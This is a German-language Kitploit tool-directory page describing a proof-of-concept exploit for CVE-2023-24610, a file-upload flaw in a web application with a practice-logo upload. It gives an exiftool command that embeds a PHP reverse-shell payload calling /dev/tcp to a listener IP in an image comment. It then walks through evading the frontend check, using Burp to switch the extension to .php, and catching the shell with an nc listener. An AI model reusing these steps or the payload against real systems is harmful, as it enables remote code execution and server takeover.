Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-24610 — Dies ist ein Proof-of-Concept für CVE-2023-24610 | Kitploit
Tools/GitHubGitHub/abbisqq/cve-2023-24610
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubabbisqq/cve-2023-24610

CVE-2023-24610

Dies ist ein Proof-of-Concept für CVE-2023-24610

Repository anzeigen
3vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-24610

Dies ist ein Proof of Concept für CVE-2023-24610

Wir beginnen mit der Erstellung einer Polyglot-Datei mit exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

nosh1

Wir ändern die Datei in png, damit sie die Frontend-Prüfung besteht.

nosh2

Danach starten wir einen nc-Listener auf Port 8888, um die Shell zu empfangen.

nosh3

Der nächste Schritt ist, sich in der Anwendung anzumelden und auf Setup zu klicken.

nosh4

Am unteren Ende der Seite sehen wir einen Bereich für das Praxislogo. Wir können eine Datei über den Bearbeiten-Button auf der rechten Seite hochladen.

nosh5

Wir klicken auf Bearbeiten und dann auf Durchsuchen, wir wählen die „.png“-Datei aus, die wir im ersten Schritt erstellt haben.

nosh6

Bevor wir auf Hochladen klicken, stellen wir sicher, dass wir die Anfrage mit Burp oder ähnlichem abfangen. Wir klicken auf Hochladen und ändern in Burp die Dateierweiterung von „png“ zu „php“

nosh7

Wir schalten den Intercept aus, damit unsere Datei hochgeladen wird, und überprüfen den zuvor gestarteten nc-Listener. Wir haben eine Reverse-Shell und die IP zeigt auf unseren Docker-Container.

nosh8

Tool herunterladen